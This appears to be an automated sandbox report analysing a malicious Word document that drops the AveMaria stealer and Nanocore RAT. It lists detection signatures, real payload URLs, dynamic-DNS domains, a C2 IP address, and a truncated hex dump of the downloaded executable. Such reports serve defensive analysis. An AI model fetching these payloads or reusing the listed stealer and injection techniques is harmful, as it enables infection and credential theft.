Windows Analysis Report N40-MR 311.doc

Overview

General Information

Sample Name: N40-MR 311.doc
Analysis ID: 457806
MD5: 0284c94401a743d97b9cca52ac790864
SHA1: fc3a473b80e9f717a68c54374aadc016cfe0d9ed
SHA256: 433fef750a44d6d44ebc9acf291ae3ad5812531d8aba3bdf543d44dcff943694
Tags: doc
Infos:

Most interesting Screenshot:

Detection

AveMaria Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AveMaria stealer
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Installs a global keyboard hook
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Sigma detected: Verclsid.exe Runs COM Object
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://hutyrtit.ydns.eu/microC.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://hutyrtit.ydns.eu/microC.exe Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Microsoft DN1\sqlmap.dll Metadefender: Detection: 20% Perma Link
Source: C:\Program Files\Microsoft DN1\sqlmap.dll ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe Metadefender: Detection: 34% Perma Link
Source: C:\ProgramData\images.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\images.exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Local\Temp\images.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\microA.exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Local\Temp\microA.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\microA.exe Metadefender: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Roaming\microA.exe ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: N40-MR 311.doc Virustotal: Detection: 43% Perma Link
Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\microA.exe Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\microA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\images.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.images.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 17.2.microA.exe.400000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 16.2.microA.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 18.2.microA.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 16_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 16_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 16_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 16_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 16_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 16_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 17_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 17_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 17_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 17_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 17_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 17_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 18_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 18_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 18_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 18_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 18_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 18_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 25_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 25_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 25_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 25_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 25_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 25_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: images.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411446 FindFirstFileW,FindNextFileW, 16_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 16_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411446 FindFirstFileW,FindNextFileW, 17_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 17_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411446 FindFirstFileW,FindNextFileW, 18_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 18_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411446 FindFirstFileW,FindNextFileW, 25_2_00411446
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 25_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, 16_2_0041154A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: microA[1].exe.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: newhosteeeee.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
Uses dynamic DNS services
Source: unknown DNS query: name: hhjhtggfr.duckdns.org
Contains functionality to download and execute PE files
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.159.80.186:6703
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 30 Jul 2021 09:52:56 GMTAccept-Ranges: bytesETag: "b34311ac2885d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:45:33 GMTContent-Length: 525312Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 30 Jul 2021 09:52:56 GMTAccept-Ranges: bytesETag: "b34311ac2885d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:45:38 GMTContent-Length: 525312Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 